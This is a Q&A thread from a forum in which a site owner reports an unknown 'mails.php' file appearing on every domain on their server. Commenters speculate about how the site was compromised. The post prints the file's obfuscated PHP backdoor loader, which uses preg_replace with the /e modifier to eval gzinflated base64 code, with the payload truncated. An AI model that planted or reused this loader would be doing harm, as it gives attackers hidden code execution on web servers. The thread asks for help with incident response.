0

I have a series of websites in my server, all of which share the same set of PHP files. They're not based in any CMS (no Wordpress, no Joomla, etc.). All of them contain my own "CMS" so to speak. I've never published my code in any public repository or other public site.

So how is it possible that I have a new file called "mails.php" in the root of every domain in my server? The contents are something like this:

<?php

preg_replace("/.*/e","\x28\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X17f9rG0vD/5/c732GtcipoMAac5CRgiBPHTpyLnfqSpInzUAECVAukSsLYzfF3f2ZmV5fVDUGc0z7vW7exQdqdnd2dnZ2dnUtJm3uTnq25LuswpTkYjvSH/240Bg8f1Efbw+ZI6zcbzbr+WK8/ftB8pLT/+Y/

...snip...

/1KRwsG3Iu0AiUSgmWYolw8UZqaSaX+ojbW56PT6vpClLsH7+jm6aYsVTuhppkpQDUoWolJXu8yrVVk/1weFsZKncsyt+M60J1V4ewhkDMNBMs4eapx5WzqqBLmLoQPu/'\x29\x29\x29\x29\x3B",".");?>

The "code" inside the string shown here is not complete (I shortened it before pasting it here) but still, I don't get how is that working. The preg_replace() method is supposed to just return a string, is it? But then the string is not received by anything. So how does it run any code at all? How does that even do something?

Anyway, the biggest question is, how did that file appear in my domains?

OMA
  • 101
  • 1
  • @Michael Hampton: How is this an "exact duplicate" of a generic how-to? – OMA Apr 14 '16 at 12:59
  • 2
    There's no further advice we can give you here. You need a forensic analysis of the whole server to answer the question, and that's something you will either need to do yourself (if you had the necessary skills) or get a consultant in for. – Michael Hampton Apr 14 '16 at 13:00
  • Chances are your custom CMS has a vulnerability of some sort. People don't need the source code to find vulnerabilities (or Windows would be perfectly secure). – ceejayoz Apr 14 '16 at 13:13
  • Do you have an idea of what kind of vulnerability can lead to writing files in the root of the domain? Can it be a vulnerability in my PHP code or only in the server itself? None of my PHP files write to the "httpdocs" root directory, so having that "mails.php" file there might maybe indicate a server vulnerability rather than PHP code vulnerability? BTW, the "mails.php" file has the SAME owner and group name as the rest of the files in the domain. So maybe it was actually uploaded through FTP/SSH? (then again, maybe it was just chown'ed somehow) – OMA Apr 14 '16 at 13:54
  • @OMA Any custom-built CMS is almost certain to contain vulnerabilities (and I say this as someone who has built at least one). It's very easy to introduce one when handling file uploads, or any call doing `file_get_contents`-style stuff with user input. If you're using FTP that's unencrypted and someone could've sniffed your password. If you're using weak passwords for SSH that could be it. If you have an old version of phpMyAdmin or WordPress or whatever it could be that. Lots of possibilities. – ceejayoz Apr 14 '16 at 13:58

0 Answers0